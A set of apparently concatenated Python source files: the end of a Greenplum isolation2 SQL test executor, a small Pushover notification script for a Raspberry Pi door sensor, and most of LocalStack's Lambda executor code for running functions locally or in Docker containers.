SQLIsolationTestCase would output "INSERT 1". As the
SQLIsolationTestCase needs to have a more fine-grained control
over the execution order than possible with PSQL, it uses
the pygresql python library instead.
Connecting to a specific database:
1. If you specify a db_name metadata in the sql file, connect to that database in all open sessions.
2. If you want a specific session to be connected to a specific database , specify the sql as follows:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
etc
Here session 1 will be connected to testdb and session 2 will be connected to test2db. You can specify @db_name only at the beginning of the session. For eg:, following would error out:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: @db_name testdb: <sql>
2: <sql>
etc
Quitting sessions:
By default, all opened sessions will be stopped only at the end of the sql file execution. If you want to explicitly quit a session
in the middle of the test execution, you can specify a flag 'q' with the session identifier. For eg:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
1q:
2: <sql>
3: <sql>
2q:
3: <sql>
2: @db_name test: <sql>
1q: ---> Will quit the session established with testdb.
2q: ---> Will quit the session established with test2db.
The subsequent 2: @db_name test: <sql> will open a new session with the database test and execute the sql against that session.
Note: Do not expect blocking behavior from explicit quit statements.
This implies that a subsequent statement can execute while the relevant
session is still undergoing exit.
Shell Execution for SQL or Output:
@pre_run can be used for executing shell command to change input (i.e. each SQL statement) or get input info;
@post_run can be used for executing shell command to change ouput (i.e. the result set printed for each SQL execution)
or get output info. Just use the env variable ${RAW_STR} to refer to the input/out stream before shell execution,
and the output of the shell commmand will be used as the SQL exeucted or output printed into results file.
1: @post_run ' TOKEN1=` echo "${RAW_STR}" | awk \'NR==3\' | awk \'{print $1}\'` && export MATCHSUBS="${MATCHSUBS}${NL}m/${TOKEN1}/${NL}s/${TOKEN1}/token_id1/${NL}" && echo "${RAW_STR}" ': SELECT token,hostname,status FROM GP_ENDPOINTS WHERE cursorname='c1';
2R: @pre_run ' echo "${RAW_STR}" | sed "s#@TOKEN1#${TOKEN1}#" ': RETRIEVE ALL FROM "@TOKEN1";
These 2 sample is to:
- Sample 1: set env variable ${TOKEN1} to the cell (row 3, col 1) of the result set, and print the raw result.
The env var ${MATCHSUBS} is used to store the matchsubs section so that we can store it into initfile when
this test case file is finished executing.
- Sample 2: replaceing "@TOKEN1" by generated token which is fetch in sample1
There are some helper functions which will be sourced automatically to make above
cases easier. See global_sh_executor.sh for more information.
$RETRIEVE_USER is a special environment vars which will be read by python to use them
as the username for retrieve mode session. `None` will be used if the value has not
been set when start retrieve mode session. See the get_retrieve_token in global_sh_executor.sh
for more information about how to get the retrieve session password.
Catalog Modification:
Some tests are easier to write if it's possible to modify a system
catalog across the *entire* cluster. To perform a utility-mode query on
all segments and the master, you can use *U commands:
*U: SET allow_system_table_mods = true;
*U: UPDATE pg_catalog.<table> SET <column> = <value> WHERE <cond>;
Since the number of query results returned by a *U command depends on
the developer's cluster configuration, it can be useful to wrap them in
a start_/end_ignore block. (Unfortunately, this also hides legitimate
failures; a better long-term solution is needed.)
Block/join flags are not currently supported with *U.
Line continuation:
If a line is not ended by a semicolon ';' which is followed by 0 or more spaces, the line will be combined with next line and
sent together as a single statement.
e.g.: Send to the server separately:
1: SELECT * FROM t1; -> send "SELECT * FROM t1;"
SELECT * FROM t2; -> send "SELECT * FROM t2;"
e.g.: Send to the server once:
1: SELECT * FROM
t1; SELECT * FROM t2; -> "send SELECT * FROM t1; SELECT * FROM t2;"
ATTENTION:
Send multi SQL statements once:
Multi SQL statements can be sent at once, but there are some known issues. Generally only the last query result will be printed.
But due to the difficulties of dealing with semicolons insides quotes, we always echo the first SQL command instead of the last
one if query() returns None. This created some strange issues like:
CREATE TABLE t1 (a INT); INSERT INTO t1 SELECT generate_series(1,1000);
CREATE 1000 (Should be INSERT 1000, but here the CREATE is taken due to the limitation)
"""
def run_sql_file(self, sql_file, out_file = None, out_dir = None, optimizer = None):
"""
Given a sql file and an ans file, this adds the specified gucs (self.gucs) to the sql file , runs the sql
against the test case database (self.db_name) and verifies the output with the ans file.
If an 'init_file' exists in the same location as the sql_file, this will be used
while doing gpdiff.
"""
# Add gucs to the test sql and form the actual sql file to be run
if not out_dir:
out_dir = self.get_out_dir()
if not os.path.exists(out_dir):
TINCSystem.make_dirs(out_dir, ignore_exists_error = True)
if optimizer is None:
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file))
else:
# sql file will be <basename>_opt.sql or <basename>_planner.sql based on optimizer
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file).replace('.sql', '_%s.sql' %self._optimizer_suffix(optimizer)))
self._add_gucs_to_sql_file(sql_file, gucs_sql_file, optimizer)
self.test_artifacts.append(gucs_sql_file)
if not out_file:
if optimizer is None:
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '.out'))
else:
# out file will be *_opt.out or *_planner.out based on optimizer
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '_%s.out' %self._optimizer_suffix(optimizer)))
self.test_artifacts.append(out_file)
executor = SQLIsolationExecutor(dbname=self.db_name)
with open(out_file, "w") as f:
executor.process_isolation_file(open(sql_file), f, out_file)
f.flush()
if out_file[-2:] == '.t':
out_file = out_file[:-2]
return out_file
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("--dbname", dest="dbname",
help="connect to database DBNAME", metavar="DBNAME")
parser.add_option("--initfile_prefix", dest="initfile_prefix",
help="The file path prefix for automatically generated initfile", metavar="INITFILE_PREFIX")
(options, args) = parser.parse_args()
# Explicitly set multiprocessing start method to 'fork' (Unix
# default) to make isolation2 work with python3.8+ on MacOS.
if sys.version_info >= (3, 8) and sys.platform == "darwin":
multiprocessing.set_start_method('fork')
executor = SQLIsolationExecutor(dbname=options.dbname)
executor.process_isolation_file(sys.stdin, sys.stdout, options.initfile_prefix)
|
m_pushover.py | # coding=utf-8
'''
pi@raspberrypi ~ $ echo $LANG
zh_TW.UTF-8
'''
import m_settings
import logging, threading
import datetime, time
import httplib, urllib, json
import collections, array
def pushoverPost(msg):
conn = httplib.HTTPSConnection("api.pushover.net:443")
conn.request("POST", "/1/messages.json",
urllib.urlencode({
"token": m_settings.PUSHOVER_APPTOKEN,
"user": m_settings.PUSHOVER_USERKEY,
"message": msg,
}), { "Content-type": "application/x-www-form-urlencoded" })
logging.info('HTTP POST Send %s' % msg)
r = conn.getresponse()
logging.info("HTTP POST status=%d , reason=%s", r.status, r.reason)
logging.info(r.read())
conn.close()
def sendPushover(q):
if not m_settings.PUSHOVER_ENABLE :
logging.info('[TestPrintOnly]Send pushover event')
return
m = '我家F門 Event px=%d' % q
t = threading.Thread(target=pushoverPost, args=(m,))
t.start() |
lambda_executors.py | import os
import re
import glob
import json
import time
import logging
import threading
import subprocess
import six
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
from pipes import quote as cmd_quote # for Python 2.7
from localstack import config
from localstack.utils.common import (
CaptureOutput, FuncThread, TMP_FILES, short_uid, save_file,
to_str, run, cp_r, json_safe, get_free_tcp_port)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils.aws.dead_letter_queue import lambda_error_to_dead_letter_queue, sqs_error_to_dead_letter_queue
from localstack.utils.cloudwatch.cloudwatch_util import store_cloudwatch_logs, cloudwatched
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_RUNTIME_PYTHON27 = 'python2.7'
LAMBDA_RUNTIME_PYTHON36 = 'python3.6'
LAMBDA_RUNTIME_PYTHON37 = 'python3.7'
LAMBDA_RUNTIME_PYTHON38 = 'python3.8'
LAMBDA_RUNTIME_NODEJS = 'nodejs'
LAMBDA_RUNTIME_NODEJS43 = 'nodejs4.3'
LAMBDA_RUNTIME_NODEJS610 = 'nodejs6.10'
LAMBDA_RUNTIME_NODEJS810 = 'nodejs8.10'
LAMBDA_RUNTIME_NODEJS10X = 'nodejs10.x'
LAMBDA_RUNTIME_NODEJS12X = 'nodejs12.x'
LAMBDA_RUNTIME_JAVA8 = 'java8'
LAMBDA_RUNTIME_JAVA11 = 'java11'
LAMBDA_RUNTIME_DOTNETCORE2 = 'dotnetcore2.0'
LAMBDA_RUNTIME_DOTNETCORE21 = 'dotnetcore2.1'
LAMBDA_RUNTIME_DOTNETCORE31 = 'dotnetcore3.1'
LAMBDA_RUNTIME_GOLANG = 'go1.x'
LAMBDA_RUNTIME_RUBY = 'ruby'
LAMBDA_RUNTIME_RUBY25 = 'ruby2.5'
LAMBDA_RUNTIME_PROVIDED = 'provided'
LAMBDA_EVENT_FILE = 'event_file.json'
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
EVENT_SOURCE_SQS = 'aws:sqs'
def get_from_event(event, key):
try:
return event['Records'][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime.startswith('nodejs')
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = '/aws/lambda/%s' % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime('%Y/%m/%d', time.gmtime(invocation_time_secs))
log_stream_name = '%s/[LATEST]%s' % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the _execute method """
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def execute(self, func_arn, func_details, event, context=None, version=None,
asynchronous=False, callback=None):
def do_execute(*args):
@cloudwatched('lambda')
def _run(func_arn=None):
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, 'eventSource') == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, 'eventSourceARN')
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(sqs_queue_arn, event, e)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(result, func_arn, event, error=raised_error, dlq_sent=dlq_sent)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug('Lambda executed in Event (asynchronous) mode, no response will be returned to caller')
FuncThread(do_execute).start()
return None, 'Lambda executed asynchronously.'
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
""" This method must be overwritten by subclasses. """
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
def run_lambda_executor(self, cmd, event=None, func_details=None, env_vars={}):
process = run(cmd, asynchronous=True, stderr=subprocess.PIPE, outfile=subprocess.PIPE,
env_vars=env_vars, stdin=True)
result, log_output = process.communicate(input=event)
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, six.string_types) and '\n' in result:
additional_logs, _, result = result.rpartition('\n')
log_output += '\n%s' % additional_logs
log_formatted = log_output.strip().replace('\n', '\n> ')
func_arn = func_details and func_details.arn()
LOG.debug('Lambda %s result / log output:\n%s\n> %s' % (func_arn, result.strip(), log_formatted))
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise Exception('Lambda process returned error status code: %s. Result: %s. Output:\n%s' %
(return_code, result, log_output))
return result
class ContainerInfo:
"""
Contains basic information about a docker container.
"""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
""" Abstract executor class for executing Lambda functions in Docker containers """
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
raise Exception('Not implemented')
def _docker_cmd(self):
""" Return the string to be used for running Docker commands. """
return config.DOCKER_CMD
def prepare_event(self, environment, event_body):
""" Return the event as a stdin string. """
# amend the environment variables for execution
environment['AWS_LAMBDA_EVENT_BODY'] = event_body
return None
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
environment = func_details.envvars.copy()
# configure USE_SSL in environment
if config.USE_SSL:
environment['USE_SSL'] = '1'
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
stdin = self.prepare_event(environment, event_body)
docker_host = config.DOCKER_HOST_FROM_CONTAINER
environment['HOSTNAME'] = docker_host
environment['LOCALSTACK_HOSTNAME'] = docker_host
environment['_HANDLER'] = handler
if os.environ.get('HTTP_PROXY'):
environment['HTTP_PROXY'] = os.environ['HTTP_PROXY']
if func_details.timeout:
environment['AWS_LAMBDA_FUNCTION_TIMEOUT'] = str(func_details.timeout)
if context:
environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
# custom command to execute in the container
command = ''
# if running a Java Lambda, set up classpath arguments
if is_java_lambda(runtime):
java_opts = Util.get_java_opts()
stdin = None
# copy executor jar into temp directory
target_file = os.path.join(lambda_cwd, os.path.basename(LAMBDA_EXECUTOR_JAR))
if not os.path.exists(target_file):
cp_r(LAMBDA_EXECUTOR_JAR, target_file)
# TODO cleanup once we have custom Java Docker image
taskdir = '/var/task'
save_file(os.path.join(lambda_cwd, LAMBDA_EVENT_FILE), event_body)
classpath = Util.get_java_classpath(target_file)
command = ("bash -c 'cd %s; java %s -cp \"%s\" \"%s\" \"%s\" \"%s\"'" %
(taskdir, java_opts, classpath, LAMBDA_EXECUTOR_CLASS, handler, LAMBDA_EVENT_FILE))
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment['NODE_TLS_REJECT_UNAUTHORIZED'] = '0'
# determine the command to be executed (implemented by subclasses)
cmd = self.prepare_execution(func_arn, environment, runtime, command, handler, lambda_cwd)
# lambci writes the Lambda result to stdout and logs to stderr, fetch it from there!
LOG.info('Running lambda cmd: %s' % cmd)
result = self.run_lambda_executor(cmd, stdin, env_vars=environment, func_details=func_details)
return result
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
""" Executor class for executing Lambda functions in re-usable Docker containers """
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars['_LAMBDA_SERVER_PORT'] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
container_info = self.prime_docker_container(runtime, func_arn, env_vars.items(), lambda_cwd)
# Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
# passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
# available for docker exec, to better support very large Lambda events (very long environment values)
exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if not command:
command = '%s %s' % (container_info.entry_point, handler)
# determine files to be copied into the container
copy_command = ''
docker_cmd = self._docker_cmd()
event_file = os.path.join(lambda_cwd, LAMBDA_EVENT_FILE)
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
copy_command = '%s cp "%s/." "%s:/var/task";' % (docker_cmd, lambda_cwd, container_info.name)
elif os.path.exists(event_file):
# otherwise, copy only the event file if it exists
copy_command = '%s cp "%s" "%s:/var/task";' % (docker_cmd, event_file, container_info.name)
cmd = (
'%s'
' %s exec'
' %s' # env variables
' %s' # container name
' %s' # run cmd
) % (copy_command, docker_cmd, exec_env_vars, container_info.name, command)
LOG.debug('Command for docker-reuse Lambda executor: %s' % cmd)
return cmd
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, runtime, func_arn, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
:param runtime: Lamda runtime environment. python2.7, nodejs6.10, etc.
:param func_arn: The ARN of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_runtime(runtime)
rm_flag = Util.get_docker_remove_flag()
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
mount_volume = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if (':' in lambda_cwd and '\\' in lambda_cwd):
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volume_str = '-v "%s":/var/task' % lambda_cwd_on_host if mount_volume else ''
# Create and start the container
LOG.debug('Creating container: %s' % container_name)
cmd = (
'%s create'
' %s' # --rm flag
' --name "%s"'
' --entrypoint /bin/bash' # Load bash when it starts.
' %s'
' --interactive' # Keeps the container running bash.
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
' %s' # env_vars
' %s' # network
' %s'
) % (docker_cmd, rm_flag, container_name, mount_volume_str, env_vars_str, network_str, docker_image)
LOG.debug(cmd)
run(cmd)
if not mount_volume:
LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
cmd = (
'%s cp'
' "%s/." "%s:/var/task"'
) % (docker_cmd, lambda_cwd, container_name)
LOG.debug(cmd)
run(cmd)
LOG.debug('Starting container: %s' % container_name)
cmd = '%s start %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd)
# give the container some time to start up
time.sleep(1)
# Get the entry point for the image.
LOG.debug('Getting the entrypoint for image: %s' % (docker_image))
cmd = (
'%s image inspect'
' --format="{{ .ContainerConfig.Entrypoint }}"'
' %s'
) % (docker_cmd, docker_image)
LOG.debug(cmd)
run_result = run(cmd)
entry_point = run_result.strip('[]\n\r ')
container_network = self.get_docker_container_network(func_arn)
LOG.debug('Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network))
return ContainerInfo(container_name, entry_point)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
docker_cmd = self._docker_cmd()
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug('Stopping container: %s' % container_name)
cmd = (
'%s stop -t0 %s'
) % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug('Removing container: %s' % container_name)
cmd = (
'%s rm %s'
) % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug('Getting all lambda containers names.')
cmd = '%s ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"' % self._docker_cmd()
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
if len(cmd_result) > 0:
container_names = cmd_result.split('\n')
else:
container_names = []
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug('Removing %d containers.' % len(container_names))
for container_name in container_names:
cmd = '%s rm -f %s' % (self._docker_cmd(), container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
# Check if the container is already running
# Note: filtering by *exact* name using regex filter '^...$' seems unstable on some
# systems. Therefore, we use a combination of filter and grep to get the results.
cmd = ("docker ps -a --filter name='%s' "
'--format "{{ .Status }} - {{ .Names }}" '
'| grep -w "%s" | cat') % (container_name, container_name)
LOG.debug('Getting status for container "%s": %s' % (container_name, cmd))
cmd_result = run(cmd)
# If the container doesn't exist. Create and start it.
container_status = cmd_result.strip()
if len(container_status) == 0:
return 0
if container_status.lower().startswith('up '):
return 1
return -1
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ''
# Get the container name.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
# Get the container network
LOG.debug('Getting container network: %s' % container_name)
cmd = (
'%s inspect %s'
' --format "{{ .HostConfig.NetworkMode }}"'
) % (docker_cmd, container_name)
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
container_network = cmd_result.strip()
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.info('Checking if there are idle containers.')
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.next_port = 1
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment, event_body):
# Tell Lambci to use STDIN for the event
environment['DOCKER_LAMBDA_USE_STDIN'] = '1'
return event_body.encode()
def prepare_execution(self, func_arn, env_vars, runtime, command, handler, lambda_cwd):
entrypoint = ''
if command:
entrypoint = ' --entrypoint ""'
else:
command = '"%s"' % handler
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
if network == 'host':
port = str(self.next_port + self.port_offset)
env_vars['DOCKER_LAMBDA_API_PORT'] = port
env_vars['DOCKER_LAMBDA_RUNTIME_PORT'] = port
self.next_port = (self.next_port + 1) % self.max_port
env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
debug_docker_java_port = '-p {p}:{p}'.format(p=Util.debug_java_port) if Util.debug_java_port else ''
docker_cmd = self._docker_cmd()
docker_image = Util.docker_image_for_runtime(runtime)
rm_flag = Util.get_docker_remove_flag()
if config.LAMBDA_REMOTE_DOCKER:
cmd = (
'CONTAINER_ID="$(%s create -i'
' %s' # entrypoint
' %s' # debug_docker_java_port
' %s' # env
' %s' # network
' %s' # --rm flag
' %s %s' # image and command
')";'
'%s cp "%s/." "$CONTAINER_ID:/var/task"; '
'%s start -ai "$CONTAINER_ID";'
) % (docker_cmd, entrypoint, debug_docker_java_port, env_vars_string, network_str, rm_flag,
docker_image, command,
docker_cmd, lambda_cwd,
docker_cmd)
else:
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
cmd = (
'%s run -i'
' %s -v "%s":/var/task'
' %s'
' %s' # network
' %s' # --rm flag
' %s %s'
) % (docker_cmd, entrypoint, lambda_cwd_on_host, env_vars_string,
network_str, rm_flag, docker_image, command)
return cmd
class LambdaExecutorLocal(LambdaExecutor):
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
environment = func_details.envvars.copy()
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
if lambda_cwd:
os.chdir(lambda_cwd)
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
queue.put(result)
process = Process(target=do_execute)
with CaptureOutput() as c:
process.run()
result = queue.get()
# Make sure to keep the log line below, to ensure the log stream gets created
log_output = 'START: Lambda %s started via "local" executor ...' % func_arn
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ('\n' if log_output else '') + stream
# store logs to CloudWatch
_store_logs(func_details, log_output)
return result
def execute_java_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
opts = config.LAMBDA_JAVA_OPTS if config.LAMBDA_JAVA_OPTS else ''
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(event))
TMP_FILES.append(event_file)
class_name = handler.split('::')[0]
classpath = '%s:%s:%s' % (main_file, Util.get_java_classpath(main_file), LAMBDA_EXECUTOR_JAR)
cmd = 'java %s -cp %s %s %s %s' % (opts, classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
LOG.warning(cmd)
result = self.run_lambda_executor(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ''
# Replace _debug_port_ with a random free port
if '_debug_port_' in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace('_debug_port_', ('%s' % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match('.*address=(\\d+).*', opts)
if m is not None:
cls.debug_java_port = m.groups()[0]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(':', '').replace('\\', '/')
if len(temp) >= 1 and temp[:1] != '/':
temp = '/' + temp
temp = '%s%s' % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_runtime(cls, runtime):
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = ['dotnetcore2.0', 'dotnetcore2.1', 'python2.7', 'python3.6', 'python3.7']
if docker_image == 'lambci/lambda' and any(img in docker_tag for img in lambdas_to_add_prefix):
docker_tag = '20191117-%s' % docker_tag
return '"%s:%s"' % (docker_image, docker_tag)
@classmethod
def get_docker_remove_flag(cls):
return '--rm' if config.LAMBDA_REMOVE_CONTAINERS else ''
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ['.']
base_dir = os.path.dirname(archive)
for pattern in ['%s/*.jar', '%s/lib/*.jar', '%s/*.zip']:
for entry in glob.glob(pattern % base_dir):
